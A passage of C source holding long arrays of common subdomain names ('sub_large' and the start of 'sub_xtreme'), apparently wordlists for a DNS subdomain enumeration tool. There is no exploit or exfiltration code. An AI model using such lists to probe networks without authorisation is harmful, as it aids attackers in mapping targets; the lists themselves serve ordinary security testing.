"sip", 
"sirius", "six", "sixxs", "sixxs-gw", "skynet", "sl", "slackware", "smokeping", "sms", "smtp", "smtp-out", "smtp01", "smtp1", "smtp2", "smtp3", "smtp4", "smtp5", "snail", "snoopy", "so-0-1-0", "so-2-0-0", "software", "sol", "solaris", "sp", "spam", "spider", "spock", "sql", "squid", "squirrel", "src", "srv", "srv01", "srv02", "srv1", "srv2", "ssh", "ssl", "ssl-vpn", "sslvpn", "staff", "stage", "staging", "start", "stat", "static", "statistics", "stats", "stock", "storage", "store", "stream", "streaming", "submission", "subversion", "sun", "support", "sv", "svn", "sw-core1", "sw1", "switch", "syslog", "system", "szerver1", "szerver2", "szerver3", "szerver4", "szerver5", "t", "tango", "tao", "tarsier", "tau", "tb", "tc1", "te-1-2", "te-1-3", "te-2-1", "te-2-2", "tech", "telnet", "temp", "teredo", "test", "test1", "test2", "test6", "test6www", "testip6", "testipv6", "tftp", "the", "thor", "ticket", "tiger", "time", "titan", "titania", "tm", "tom", "tools", "tp", "tracker", "traffic", "training", "trinity", "ts", "ts1", "tt", "tunnel", "turing", "turtle", "tv", "u", "ubuntu", "uk", "unix", "up", "update", "updates", "upload", "ur01", "ur02", "ur04", "uranus", "us", "usenet", "user", "users", "uucp", "v", "v1", "v2", "v6", "v6gw", "v6www", "vab-core-1", "vab2-core-1", "vc", "ve", "ve1", "vega", "venus", "video", "video6", "virtual", "vista", "vl100", "vlad", "vlan2", "vm", "vm0", "vm1", "vm2", "voip", "vox", "voyager", "vpn", "vpn1", "vpn2", "vps", "vps1", "w", "w1", "w3", "wap", "wbm0", "wbm1", "web", "web01", "web02", "web03", "web1", "web2", "web3", "web4", "webcam", "webcast", "webdev", "weblog", "webmail", "webserver", "webservice", "webservices", "websites", "webstats", "whois", "wiki", "win", "windows", "wins", "wireless", "wlan", "wm", "wp", "wpad", "ws", "ws1", "ws2", "www", "www-1", "www-2", "www-3", "www-6", "www-ipv6", "www-v6", "www1", "www2", "www3", "www4", "www5", "www6", "www6test", "www7", "wwwipv6", "wwwtest6", "wwwv6", "x", "xcii", "y", "yankee", 
"z", "zebra", "zeus", "zimbra", "zs", "zulu", "" }; char *sub_large[] = { "0", "03", "1", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "1a", "1b", "1c", "1cust1", "1cust10", "1cust11", "1cust12", "1cust13", "1cust14", "1cust15", "1cust16", "1cust17", "1cust18", "1cust19", "1cust2", "1cust20", "1cust21", "1cust22", "1cust23", "1cust24", "1cust25", "1cust26", "1cust27", "1cust28", "1cust29", "1cust3", "1cust30", "1cust31", "1cust32", "1cust33", "1cust34", "1cust35", "1cust36", "1cust37", "1cust38", "1cust39", "1cust4", "1cust40", "1cust41", "1cust42", "1cust43", "1cust44", "1cust45", "1cust46", "1cust47", "1cust48", "1cust49", "1cust5", "1cust50", "1cust51", "1cust52", "1cust53", "1cust54", "1cust55", "1cust56", "1cust57", "1cust58", "1cust59", "1cust6", "1cust60", "1cust61", "1cust62", "1cust63", "1cust64", "1cust65", "1cust66", "1cust67", "1cust68", "1cust69", "1cust7", "1cust70", "1cust71", "1cust72", "1cust73", "1cust74", "1cust75", "1cust76", "1cust77", "1cust78", "1cust79", "1cust8", "1cust80", "1cust81", "1cust82", "1cust83", "1cust84", "1cust85", "1cust86", "1cust87", "1cust88", "1cust89", "1cust9", "1cust90", "1cust91", "1cust92", "1cust93", "1cust94", "1cust95", "1cust96", "1cust97", "1cust98", "1cust99", "1d", "1e", "1f", "2", "20", "21", "22", "23", "24", "25", "26", "27", "28", "29", "2a", "2b", "2c", "2cust1", "2cust10", "2cust11", "2cust12", "2cust13", "2cust14", "2cust15", "2cust16", "2cust17", "2cust18", "2cust19", "2cust2", "2cust20", "2cust21", "2cust22", "2cust23", "2cust24", "2cust25", "2cust26", "2cust27", "2cust28", "2cust29", "2cust3", "2cust30", "2cust31", "2cust32", "2cust33", "2cust34", "2cust35", "2cust36", "2cust37", "2cust38", "2cust39", "2cust4", "2cust40", "2cust41", "2cust42", "2cust43", "2cust44", "2cust45", "2cust46", "2cust47", "2cust48", "2cust49", "2cust5", "2cust50", "2cust51", "2cust52", "2cust53", "2cust54", "2cust55", "2cust56", "2cust57", "2cust58", "2cust59", "2cust6", "2cust60", "2cust61", "2cust62", 
"2cust7", "2cust8", "2cust9", "2d", "2e", "2f", "3", "30", "31", "31337", "32", "33", "34", "35", "36", "37", "38", "39", "3a", "3b", "3c", "3d", "3e", "3f", "4", "40", "41", "42", "43", "44", "45", "46", "47", "48", "49", "4a", "4b", "4c", "4d", "4e", "4f", "5", "50", "51", "52", "53", "54", "55", "56", "57", "58", "59", "5a", "5b", "5c", "5d", "5e", "5f", "6", "60", "61", "62", "63", "64", "65", "66", "67", "68", "69", "6a", "6b", "6c", "6d", "6e", "6f", "6net", "6test", "6to4", "7", "70", "71", "72", "73", "74", "75", "76", "77", "78", "79", "7a", "7b", "7c", "7d", "7e", "7f", "8", "80", "81", "82", "83", "84", "85", "86", "87", "88", "89", "8a", "8b", "8c", "8d", "8e", "8f", "9", "90", "91", "92", "93", "94", "95", "96", "97", "98", "99", "9a", "9b", "9c", "9d", "9e", "9f", "a", "a0", "a01", "a02", "a1", "a2", "a20", "a21", "a3", "a4", "a5", "a6", "a7", "a8", "a9", "aa", "aaa", "aaaa", "ab", "abc", "ac", "access", "accounting", "accounts", "achilles", "acid", "ad", "adam", "admin", "adns1", "ads", "adsl", "ae", "ae-0", "ae-1", "ae-2", "af", "ag", "agenda", "agent", "aix", "ajax", "ak", "al", "alaska", "albuquerque", "alice", "allen", "alpha", "amanda", "ams-core-1", "andromeda", "announce", "anonsvn", "antares", "antispam", "antivirus", "ao", "ap", "apache", "apache2-adamant", "apache2-argon", "apache2-blow", "apache2-bongo", "apache2-cabo", "apache2-cid", "apache2-dap", "apache2-emu", "apache2-fritz", "apache2-grog", "apache2-heavy", "apache2-igloo", "apache2-jolly", "apache2-kant", "apache2-linus", "apache2-moon", "apache2-noxim", "apache2-ogle", "apache2-pat", "apache2-quack", "apache2-rank", "apache2-sith", "apache2-twiddle", "apache2-udder", "apache2-vat", "apache2-whippit", "apache2-xenon", "apache2-yak", "apache2-zoo", "api", "apollo", "app", "app1", "app2", "apple", "apply", "apps", "aq", "ar01", "ar02", "ar2", "arachne", "arcnet6", "ares", "argos", "ari", "ariel", "arizona", "artemis", "as", "as0", "as1", "as2", "asterisk", "asterix", "at", "athena", 
"atlanta", "atlantis", "atlas", "atom", "atw", "au", "aurora", "auth", "auth0", "auth00", "auth01", "auth02", "auth03", "auth2", "auto", "autodiscover", "av", "avalon", "avmail", "aw", "az", "b", "b0", "b02", "b1", "b10", "b2", "b3", "b4", "b5", "b6", "b7", "b8", "b9", "ba", "backbone", "backup", "backups", "baker", "banana", "barracuda", "bart", "bb", "bb1", "bbs", "bbs6", "bc", "bcast", "bd", "be", "bender", "beta", "bf", "bg", "bgp", "bi", "biblioteca", "biff", "billing", "bip1-gw", "biz", "bl", "black", "blackberry", "blackboard", "blacksun", "blade", "blog", "blog6", "blogs", "blue", "bm0", "bm1", "bm2", "bm3", "bnc", "bo", "bob", "border", "boston", "bot", "box", "bp", "br", "br2", "brain", "bravo", "bridge", "broadcast", "bsd", "bt", "bt6", "bug", "bugs", "bugzilla", "build", "bw", "by", "c", "c0", "c1", "c2", "c3", "c4", "c5", "c6", "c7", "c8", "c9", "ca", "cache", "cacti", "cafe", "calendar", "call", "callisto", "calypso", "cam", "canal", "careers", "cas", "casper", "castor", "cat", "catalog", "cb", "cc", "ccxvii", "cd", "ce", "ce1", "centos", "cert", "certificates", "cf", "cfengine", "cg", "cgi", "ch", "charlie", "charlotte", "charon", "chat", "chi", "chicago", "chimera", "chris", "chronos", "ci", "ci53", "ci96", "cisco", "cisco1", "cisco2", "citrix", "class", "cleveland", "client", "clients", "cloud", "club", "cluster", "clyde", "cm", "cm0", "cm1", "cm10", "cm11", "cm12", "cm13", "cm14", "cm15", "cm16", "cm17", "cm18", "cm19", "cm2", "cm20", "cm21", "cm22", "cm24", "cm25", "cm26", "cm27", "cm28", "cm29", "cm3", "cm31", "cm32", "cm33", "cm34", "cm35", "cm36", "cm37", "cm38", "cm39", "cm4", "cm41", "cm43", "cm44", "cm45", "cm47", "cm48", "cm49", "cm5", "cm50", "cm52", "cm53", "cm54", "cm56", "cm57", "cm58", "cm6", "cm60", "cm61", "cm62", "cm64", "cm67", "cm68", "cm69", "cm7", "cm74", "cm75", "cm76", "cm77", "cm78", "cm8", "cm80", "cm81", "cm82", "cm83", "cm85", "cm86", "cm87", "cm88", "cm90", "cm92", "cm94", "cm95", "cm96", "cm97", "cm98", "cm99", "cms", 
"cn", "co", "cocoa", "code", "colo0-gw", "colorado", "com", "community", "compaq", "conf", "conference", "connect", "console", "constellation", "contact", "content", "cook", "core", "core1", "core2", "corona", "corp", "corpmail", "correo", "cp", "cpe", "cq", "cr0", "cr1", "cr2", "cr3", "cricket", "crm", "cs", "csg", "cust", "customer", "cv", "cvs", "cw", "cz", "d", "d0", "d1", "d1-0", "d10", "d11", "d12", "d13", "d14", "d15", "d16", "d17", "d18", "d19", "d2", "d20", "d21", "d22", "d23", "d24", "d25", "d26", "d27", "d28", "d29", "d3", "d30", "d31", "d32", "d33", "d34", "d35", "d36", "d37", "d38", "d39", "d4", "d40", "d41", "d42", "d43", "d44", "d45", "d46", "d47", "d48", "d49", "d5", "d50", "d51", "d52", "d53", "d54", "d55", "d56", "d57", "d58", "d59", "d6", "d60", "d61", "d62", "d63", "d64", "d65", "d66", "d67", "d68", "d69", "d7", "d70", "d71", "d72", "d73", "d74", "d75", "d76", "d77", "d78", "d79", "d8", "d80", "d81", "d82", "d83", "d84", "d85", "d86", "d87", "d88", "d89", "d9", "d90", "d91", "d92", "d93", "d94", "d95", "d96", "d97", "d98", "d99", "da", "data", "database", "db", "db0", "db01", "db1", "db2", "dc", "dc1", "dd", "dds", "de", "de-cix", "debian", "decix", "default", "defiant", "dell", "delta", "demo", "demon", "demon-gw", "depot", "des", "design", "desktop", "dev", "dev01", "dev1", "dev2", "deve", "devel", "develop", "developers", "development", "df", "dh", "dhcp", "dhcp-pool", "dhcp1", "dhcp2", "dial", "diana", "dict", "digital", "dino", "dione", "dirac", "directory", "disc", "disco", "discovery", "disk", "dist", "dk", "dl", "dmz", "dn", "dns", "dns-2", "dns0", "dns00", "dns01", "dns02", "dns03", "dns1", "dns2", "dns3", "dns4", "dns6", "dnscache1", "dnscache2", "do", "doc", "docs", "domain", "domains", "domino", "doom", "download", "downloads", "dr", "drac", "dragon", "drupal", "ds", "dsl", "dt", "dx", "dy", "dyn", "dynamic", "e", "e0", "e1", "e2", "e3", "e4", "e5", "e6", "e7", "e8", "e9", "ea", "eagle", "earth", "eb", "ec", "echo", "ed", "edge", 
"edu", "ee", "ef", "efnet", "eh", "em", "email", "en", "enable", "enc", "eng", "engineering", "enigma", "enterprise", "enum", "eo", "ep", "epp", "eprints", "er", "erp", "es", "et", "eta", "eth0", "eth1", "eth2", "eu", "eunet-gw", "eunomia", "europa", "eve", "events", "ex", "exch", "exchange", "exeter", "extern", "extranet", "f", "f0", "f1", "f2", "f3", "f4", "f5", "f6", "f7", "f8", "f9", "fa", "fa-0-0", "fa0-0", "falcon", "fax", "fb", "fc", "fd", "fe", "fe0-0", "fe2-0", "feeds", "ff", "fg", "fi", "fiberlink", "fido", "files", "fileserver", "filter", "finance", "finger", "fire", "firewall", "fl", "flash", "flow", "fm", "forum", "forums", "foto", "fotos", "fox", "foxtrot", "fp", "fr", "france", "frank", "fred", "free", "freebsd", "freemail", "front", "fry", "fs", "fs1", "ftp", "ftp0", "ftp1", "ftp2", "ftp3", "ftp6", "fun", "fw", "fw01", "fw1", "fw1-gw", "fw2", "fx", "g", "gaia", "galatea", "galeria", "galerie", "gallery", "gamma", "gandalf", "gate", "gate1", "gatekeeper", "gateway", "gauss", "gc", "ge-0", "ge-0-0-0-0", "ge0-1", "ge0-2", "geb", "gemini", "gentoo", "germany", "gh", "gi0-1", "gigabitethernet0", "gigabitethernet1", "gis", "git", "gk", "gm", "go", "gold", "golf", "gopher", "gp", "gps", "gr", "green", "group", "groups", "gs", "gt", "guest", "guide", "gw", "gw-ipv6", "gw01", "gw1", "gw2", "gw3", "gw6", "gx", "gz", "h", "h1", "h2", "h3", "h4", "ha", "hades", "hal", "hammer", "hc", "hd", "he", "helene", "helios", "helium", "hello", "help", "helpdesk", "hera", "hercules", "hermes", "hg", "hh", "hi", "hidden", "hk", "hm", "hobbes", "hobby-gw", "home", "homepage", "homer", "honeypot", "host", "host-2", "host-3", "host-4", "host-5", "host-6", "host0", "host01", "host02", "host1", "host10", "host11", "host12", "host13", "host14", "host15", "host16", "host17", "host18", "host19", "host2", "host20", "host21", "host22", "host23", "host24", "host25", "host26", "host27", "host28", "host29", "host3", "host30", "host31", "host32", "host33", "host34", "host35", "host36", 
"host37", "host38", "host39", "host4", "host40", "host41", "host42", "host43", "host44", "host45", "host46", "host47", "host48", "host49", "host5", "host50", "host51", "host52", "host53", "host54", "host55", "host56", "host57", "host58", "host59", "host6", "host60", "host61", "host62", "host63", "host64", "host65", "host66", "host67", "host68", "host69", "host7", "host70", "host71", "host72", "host73", "host74", "host75", "host76", "host77", "host78", "host79", "host8", "host80", "host81", "host82", "host83", "host84", "host85", "host86", "host87", "host88", "host89", "host9", "host90", "host91", "host92", "host93", "host94", "host95", "host96", "host97", "host98", "host99", "hosting", "hotel", "hotspot", "houston", "hp", "hq", "hs", "http", "https", "hu", "hub", "hwmaint", "hydra", "hyperion", "i", "iax", "ibm", "ic", "ice", "icecube", "icons", "ict", "id", "idp", "ids", "ie", "if", "if-0-0-0", "if-10-0-0", "if-2-0-0", "ik", "illusion", "im", "images", "imap", "imap4", "imaps", "img", "in", "inc", "inet", "inferno", "info", "ins2", "inside", "install", "int", "intern", "internal", "international", "internet", "internet2", "intra", "intranet", "invalid", "investor", "io", "ip", "ip00", "ip01", "ip02", "ip03", "ip04", "ip05", "ip06", "ip07", "ip1", "ip10", "ip11", "ip12", "ip13", "ip14", "ip15", "ip16", "ip17", "ip18", "ip19", "ip2", "ip20", "ip21", "ip22", "ip23", "ip24", "ip25", "ip26", "ip27", "ip28", "ip29", "ip3", "ip30", "ip31", "ip32", "ip33", "ip34", "ip35", "ip36", "ip37", "ip38", "ip39", "ip4", "ip40", "ip41", "ip42", "ip43", "ip44", "ip45", "ip46", "ip47", "ip48", "ip49", "ip5", "ip50", "ip51", "ip52", "ip53", "ip54", "ip55", "ip56", "ip57", "ip58", "ip59", "ip6", "ip60", "ip61", "ip62", "ip65", "ip66", "ip67", "ip68", "ip69", "ip6test", "ip7", "ip70", "ip71", "ip72", "ip73", "ip74", "ip75", "ip76", "ip77", "ip78", "ip79", "ip8", "ip80", "ip81", "ip82", "ip83", "ip84", "ip85", "ip86", "ip87", "ip88", "ip89", "ip9", "ip90", "ip91", "ip92", "ip93", "ip94", 
"ip95", "ip96", "ip97", "ip98", "ip99", "iphone", "ipmi", "ipsec", "iptv", "ipv4", "ipv6", "ipv6-gw", "ipv6-router", "ipv6cam", "ipv6forum", "ipv6gw", "ipv6test", "ipx", "irc", "irc6", "ircd", "ireland", "iris", "irssi", "is", "isaiah", "isis", "issues", "it", "itchy", "ix", "ix-2-2", "j", "jabber", "janus", "java", "jg", "jo", "jobs", "jp", "juliet", "jupiter", "jw", "k", "ka", "kb", "kdc1", "kepler", "kerberos", "kernel", "keyserver", "kf", "king", "kk", "kl", "km", "ks", "kst-core-1", "kvm", "kz", "l0", "l1", "la", "lab", "labs", "laforge", "lambda", "lan", "lan-gate", "laptop", "lb1", "lc", "ldap", "ldap1", "ldap2", "learn", "legacy", "lenny", "leo", "lg", "li", "lib", "library", "lim-core-1", "lima", "link", "linux", "lisa", "list", "listes", "lists", "listserv", "listserver", "live", "lj", "lm", "lo", "lo-0", "lo-1", "lo0", "lo0-0", "lo1", "local", "localhost", "log", "logger", "logging", "loghost", "login", "logs", "loki", "london", "loop0", "loopback0", "lorien", "lotus", "ls", "lt", "lu", "luke", "luna", "lxxxix", "m", "m-net", "m1", "m2", "ma", "mac", "mail", "mail0", "mail01", "mail02", "mail03", "mail1", "mail10", "mail11", "mail12", "mail13", "mail14", "mail15", "mail16", "mail2", "mail20", "mail3", "mail4", "mail5", "mail6", "mail7", "mail8", "mail9", "mailbox", "mailer", "mailgate", "mailgw", "mailgw3", "mailhost", "mailin", "mailing", "mailman", "mailout", "mailrelay", "mailserver", "mailsrv", "mailtest", "main", "manage", "management", "map", "maps", "marketing", "mars", "marvin", "mary", "master", "matrix", "max", "maxwell", "mb", "mc", "md", "me", "media", "member", "members", "mercury", "merlin", "messenger", "meta", "mi", "mickey", "mike", "minerva", "miranda", "mirror", "mirrors", "mj", "mk", "ml", "mm", "mobile", "mon", "mon1", "mon2", "monitor", "monitor01", "monitoring", "moodle", "moon", "mordor", "moria", "moscow", "mout", "movies", "mp", "mp3", "mpeg", "mr", "mrtg", "ms", "ms1", "mta", "mta1", "mta2", "mta3", "mta4", "mu", "multimedia", 
"munin", "music", "mv", "mx", "mx0", "mx01", "mx02", "mx03", "mx1", "mx10", "mx11", "mx12", "mx13", "mx14", "mx15", "mx16", "mx17", "mx18", "mx19", "mx2", "mx20", "mx21", "mx22", "mx23", "mx24", "mx25", "mx26", "mx27", "mx28", "mx29", "mx3", "mx30", "mx31", "mx32", "mx33", "mx34", "mx35", "mx36", "mx37", "mx38", "mx39", "mx4", "mx40", "mx41", "mx42", "mx43", "mx44", "mx45", "mx46", "mx47", "mx48", "mx49", "mx5", "mx50", "mx51", "mx52", "mx53", "mx54", "mx55", "mx56", "mx57", "mx58", "mx59", "mx6", "mx60", "mx61", "mx62", "mx63", "mx64", "mx65", "mx66", "mx67", "mx68", "mx69", "mx7", "mx70", "mx71", "mx72", "mx73", "mx74", "mx75", "mx76", "mx77", "mx78", "mx79", "mx8", "mx80", "mx81", "mx82", "mx83", "mx84", "mx85", "mx86", "mx87", "mx88", "mx89", "mx9", "mx90", "mx91", "mx92", "mx93", "mx94", "mx95", "mx96", "mx97", "mx98", "mx99", "my", "mysql", "mysql1", "mz", "n", "na", "nagios", "name", "nameserver", "nas", "nat", "nb", "nc", "nd", "nds", "ne", "neo", "neon", "neptun", "neptune", "nessus", "net", "netapp", "netlab", "netstat", "network", "nevada", "new", "news", "newsfeed", "newsfeeds", "newsletter", "newton", "newyork", "nfs", "ni", "nic", "nl", "nm", "nms", "nn", "nntp", "no", "noc", "node", "node1", "node2", "nokia", "notes", "november", "ns", "ns-ext", "ns0", "ns01", "ns02", "ns03", "ns1", "ns10", "ns11", "ns15", "ns2", "ns3", "ns4", "ns5", "ns6", "ns7", "nsa", "nsauth1", "nscache", "nscache1", "nscache2", "nss", "nsv6", "ntp", "ntp0", "ntp1", "ntp2", "ntp3", "null", "nx", "o1", "oa", "ob", "oberon", "oc", "oc48-pos9-0", "odin", "of", "office", "oh", "ojp-apply", "old", "oleane-gw", "omega", "one", "online", "op", "open", "openbsd", "openvpn", "operations", "ops", "oracle", "orange", "order", "orion", "os", "oscar", "out", "outbound", "outlook", "owa", "ox", "oz", "p", "p1", "p2", "pa", "packages", "page", "pages", "pan", "panda", "pandora", "panoramix", "papa", "paris", "partner", "partners", "pat", "pbx", "pc", "pc01", "pc02", "pc03", "pc04", "pc1", 
"pc10", "pc11", "pc12", "pc13", "pc14", "pc15", "pc16", "pc17", "pc18", "pc19", "pc2", "pc20", "pc21", "pc22", "pc23", "pc24", "pc25", "pc26", "pc27", "pc28", "pc29", "pc3", "pc30", "pc31", "pc32", "pc33", "pc34", "pc35", "pc36", "pc37", "pc38", "pc39", "pc4", "pc40", "pc41", "pc42", "pc43", "pc44", "pc45", "pc46", "pc47", "pc48", "pc49", "pc5", "pc50", "pc51", "pc52", "pc53", "pc54", "pc55", "pc56", "pc57", "pc58", "pc59", "pc6", "pc60", "pc61", "pc62", "pc63", "pc64", "pc65", "pc66", "pc67", "pc68", "pc69", "pc7", "pc70", "pc71", "pc72", "pc73", "pc74", "pc75", "pc76", "pc77", "pc78", "pc79", "pc8", "pc80", "pc81", "pc82", "pc83", "pc84", "pc85", "pc86", "pc87", "pc88", "pc89", "pc9", "pc90", "pc91", "pc92", "pc93", "pc94", "pc95", "pc96", "pc97", "pc98", "pc99", "pd", "pda", "pdc", "pe", "peach", "pegasus", "people", "pf", "pgp", "phi", "phobos", "phoenix", "phone", "photo", "photos", "php", "pi", "picard", "pics", "pictures", "pipex-gw", "pironet", "pix", "pk", "pki", "pl", "pluto", "pm", "pm1", "po", "po-1", "po-2", "po1", "poczta", "pop", "pop2", "pop3", "pop3s", "portal", "pos1-0", "poseidon", "posix", "post", "posta", "powertech-gw", "ppp2", "pptp", "pq", "prensa", "preprod", "press", "print", "printer", "printserver", "priv", "privat", "prod", "project", "projects", "prometheus", "proton", "proxy", "proxy1", "proxy2", "ps", "pt", "pub", "public", "puck", "q", "qa", "qp", "quake", "quark", "quebec", "queen", "r", "r00", "r01", "r02", "r1", "r2", "ra", "radio", "radius", "radius1", "radius2", "raptor", "rc", "rcs", "rd", "read", "red", "redhat", "redirect2", "reg", "register", "relay", "relay01", "relay02", "relay1", "relay2", "releases", "remote", "reports", "res", "res1", "res2", "research", "reseller", "reserved", "resolv1", "resolver", "resolver1", "resolver2", "reverse", "ripe", "ris", "rm", "rn", "rns2", "ro", "robert", "romeo", "root", "rose", "router", "router1", "router2", "rp", "rr", "rss", "rsync", "rt", "rt2", "rtr", "ru", "rv", "rwhois", "rz", 
"s", "s0", "s01", "s1", "s10", "s11", "s2", "s3", "s4", "s5", "s6", "s7", "s8", "s9", "sa", "sales", "sam", "sandbox", "sap", "sara", "saturn", "sb", "sbs", "sc", "scanner", "scotty", "se", "search", "search6", "sec", "sec1", "secure", "securemail", "security", "serial", "server", "server01", "server1", "server2", "server3", "server4", "server5", "server6", "servers", "service", "services", "services1", "servidor", "sf", "sftp", "sg", "sh", "share", "sharepoint", "shell", "shell1", "shop", "sigma", "silc", "silver", "sip", "sirius", "site", "six", "sixxs", "sixxs-gw", "sj", "sk", "skynet", "sl", "slackware", "sm", "smc", "smokeping", "sms", "smtp", "smtp-out", "smtp01", "smtp02", "smtp1", "smtp10", "smtp2", "smtp3", "smtp4", "smtp5", "smtp6", "smtp7", "smtp8", "snail", "snmp-trap", "snoopy", "so-0-0-0", "so-0-0-1", "so-0-1-0", "so-2-0-0", "software", "sol", "solaris", "solutions", "source", "sp", "spain", "spam", "spider", "spiderman", "spl", "splunk", "spock", "sprint", "sql", "sql1", "squid", "squirrel", "sr", "src", "srv", "srv01", "srv02", "srv1", "srv2", "srv3", "ssc", "ssh", "ssl", "ssl-vpn", "sslvpn", "staff", "stage", "staging", "star", "start", "stat", "static", "statistics", "stats", "stock", "storage", "store", "stream", "streaming", "student", "studio", "su", "sub", "submission", "submit", "subversion", "sun", "sun01", "sun02", "sun1", "superman", "support", "survey", "sv", "sv1", "svn", "svr01", "svr02", "sw", "sw-core1", "sw0", "sw01", "sw1", "sw2", "switch", "switch1", "sydney", "sysadmin", "syslog", "system", "sz", "szerver1", "szerver2", "szerver3", "szerver4", "szerver5", "t", "t1", "ta", "talk", "tango", "tao", "tarsier", "tau", "tb", "tc", "tc1", "te-1-2", "te-1-3", "te-2-1", "te-2-2", "te-3-1", "team", "tech", "techsupport", "telephone", "telnet", "temp", "teredo", "teredo-gw", "teredo-relay", "terminal", "terror", "test", "test1", "test2", "test6", "test6www", "testbed", "testing", "testip6", "testipv6", "testsite", "tftp", "the", "theta", 
"thor", "ticket", "tiger", "time", "titan", "titania", "tj", "tk", "tm", "to", "toad", "tom", "tomocha", "tool", "tools", "tour", "tp", "tr", "tracker", "traffic", "training", "trinity", "triton", "ts", "ts1", "tsv01", "tt", "tu0", "tunnel", "tunnel2", "tunnelbroker", "turing", "turtle", "tv", "tw", "tx", "u", "uat", "ubuntu", "ui", "uk", "undernet-gw", "uni", "uniform", "union", "unix", "unknown", "up", "update", "updates", "upload", "upsilon", "ur", "ur01", "ur02", "ur03", "ur04", "uranus", "us", "usa", "usenet", "user", "users", "ut", "uu", "uucp", "uw", "uz", "v", "v1", "v2", "v6", "v6gw", "v6www", "vaak", "vab-core-1", "vab2-core-1", "vault", "vc", "vds", "ve", "ve1", "ve8", "vega", "venus", "victor", "video", "video6", "videos", "viking", "violet", "vip", "virtual", "vista", "vk", "vl-6", "vl10", "vl100", "vl102", "vlad", "vlan-100", "vlan1", "vlan100", "vlan2", "vm", "vm0", "vm1", "vm2", "vm3", "vmm", "vnc", "vo", "voice", "voip", "vox", "voyager", "vpn", "vpn1", "vpn2", "vps", "vps1", "vps2", "vr", "vs", "vt", "vw", "vz", "w", "w-04", "w1", "w2", "w3", "wallet", "wan", "wap", "warlord", "washington", "wbm0", "wbm1", "wc", "web", "web0", "web01", "web02", "web03", "web1", "web2", "web3", "web4", "web5", "webadmin", "webcache", "webcam", "webcast", "webconf", "webct", "webdev", "webhelp", "weblog", "webmail", "webmail2", "webmaster", "webmin", "webserv", "webserver", "webservice", "webservices", "websites", "websrv", "webstats", "webster", "welcome", "west", "wg", "wh", "wh1", "whois", "wi", "wifi", "wiki", "win", "win2008", "win2k", "win2k8", "windows", "windowsxp", "winproxy", "wins", "winxp", "wireless", "wk", "wl", "wlan", "wm", "wordpress", "work", "world", "wp", "wpad", "wq", "ws", "ws1", "ws2", "ws3", "ws4", "ws5", "wt", "www", "www-1", "www-2", "www-3", "www-6", "www-ipv6", "www-v6", "www-v6v4", "www01", "www03", "www1", "www2", "www3", "www4", "www5", "www6", "www6test", "www7", "www8", "www9", "wwwdev", "wwwipv6", "wwwtest6", "wwwv6", "wx", "x", 
"x-ray", "xb", "xc", "xcii", "xd", "xdmcp", "xe-0-2-0-0", "xen", "xi", "xj", "xk", "xml", "xo", "xp", "xs", "xt", "xtel", "xx", "xy", "y", "yankee", "yellow", "yl", "yn", "young", "yp", "ys", "yv", "z", "za", "zc", "zebra", "zeus", "zimbra", "zk", "zm", "zo", "zope", "zq", "zs", "zt", "zu", "zulu", "zw", "" }; char *sub_xtreme[] = { "0", "01", "02", "03", "04", "05", "1", "10", "10gigabitethernet1-2", "11", "12", "13", "14", "15", "16", "17", "18", "19", "1a", "1b", "1c", "1cust1", "1cust10", "1cust11", "1cust12", "1cust13", "1cust14", "1cust15", "1cust16", "1cust17", "1cust18", "1cust19", "1cust2", "1cust20", "1cust21", "1cust22", "1cust23", "1cust24", "1cust25", "1cust26", "1cust27", "1cust28", "1cust29", "1cust3", "1cust30", "1cust31", "1cust32", "1cust33", "1cust34", "1cust35", "1cust36", "1cust37", "1cust38", "1cust39", "1cust4", "1cust40", "1cust41", "1cust42", "1cust43", "1cust44", "1cust45", "1cust46", "1cust47", "1cust48", "1cust49", "1cust5", "1cust50", "1cust51", "1cust52", "1cust53", "1cust54", "1cust55", "1cust56", "1cust57", "1cust58", "1cust59", "1cust6", "1cust60", "1cust61", "1cust62", "1cust63", "1cust64", "1cust65", "1cust66", "1cust67", "1cust68", "1cust69", "1cust7", "1cust70", "1cust71", "1cust72", "1cust73", "1cust74", "1cust75", "1cust76", "1cust77", "1cust78", "1cust79", "1cust8", "1cust80", "1cust81", "1cust82", "1cust83", "1cust84", "1cust85", "1cust86", "1cust87", "1cust88", "1cust89", "1cust9", "1cust90", "1cust91", "1cust92", "1cust93", "1cust94", "1cust95", "1cust96", "1cust97", "1cust98", "1cust99", "1d", "1e", "1f", "1g-bge0", "1g-eth0", "2", "20", "21", "21cust1", "21cust10", "21cust11", "21cust12", "21cust13", "21cust14", "21cust15", "21cust16", "21cust17", "21cust18", "21cust19", "21cust2", "21cust20", "21cust21", "21cust22", "21cust23", "21cust24", "21cust25", "21cust26", "21cust27", "21cust28", "21cust29", "21cust3", "21cust30", "21cust31", "21cust32", "21cust33", "21cust34", "21cust35", "21cust36", "21cust37", "21cust38", 
"21cust39", "21cust4", "21cust40", "21cust41", "21cust42", "21cust43", "21cust44", "21cust45", "21cust46", "21cust47", "21cust48", "21cust49", "21cust5", "21cust50", "21cust51", "21cust52", "21cust53", "21cust54", "21cust55", "21cust56", "21cust57", "21cust58", "21cust59", "21cust6", "21cust60", "21cust61", "21cust62", "21cust63", "21cust64", "21cust65", "21cust66", "21cust67", "21cust68", "21cust69", "21cust7", "21cust70", "21cust71", "21cust72", "21cust73", "21cust74", "21cust75", "21cust76", "21cust77", "21cust78", "21cust79", "21cust8", "21cust80", "21cust81", "21cust82", "21cust83", "21cust84", "21cust85", "21cust86", "21cust87", "21cust88", "21cust89", "21cust9", "21cust90", "21cust91", "21cust92", "21cust93", "21cust94", "21cust95", "21cust96", "21cust97", "21cust98", "21cust99", "22", "22cust1", "22cust10", "22cust11", "22cust12", "22cust13", "22cust14", "22cust15", "22cust16", "22cust17", "22cust18", "22cust19", "22cust2", "22cust20", "22cust21", "22cust22", "22cust23", "22cust24", "22cust25", "22cust26", "22cust27", "22cust28", "22cust29", "22cust3", "22cust30", "22cust31", "22cust32", "22cust33", "22cust34", "22cust35", "22cust36", "22cust37", "22cust38", "22cust39", "22cust4", "22cust40", "22cust41", "22cust42", "22cust43", "22cust44", "22cust45", "22cust46", "22cust47", "22cust48", "22cust49", "22cust5", "22cust50", "22cust51", "22cust52", "22cust53", "22cust54", "22cust55", "22cust56", "22cust57", "22cust58", "22cust59", "22cust6", "22cust60", "22cust61", "22cust62", "22cust63", "22cust64", "22cust65", "22cust66", "22cust67", "22cust68", "22cust69", "22cust7", "22cust70", "22cust71", "22cust72", "22cust73", "22cust74", "22cust75", "22cust76", "22cust77", "22cust78", "22cust79", "22cust8", "22cust80", "22cust81", "22cust82", "22cust83", 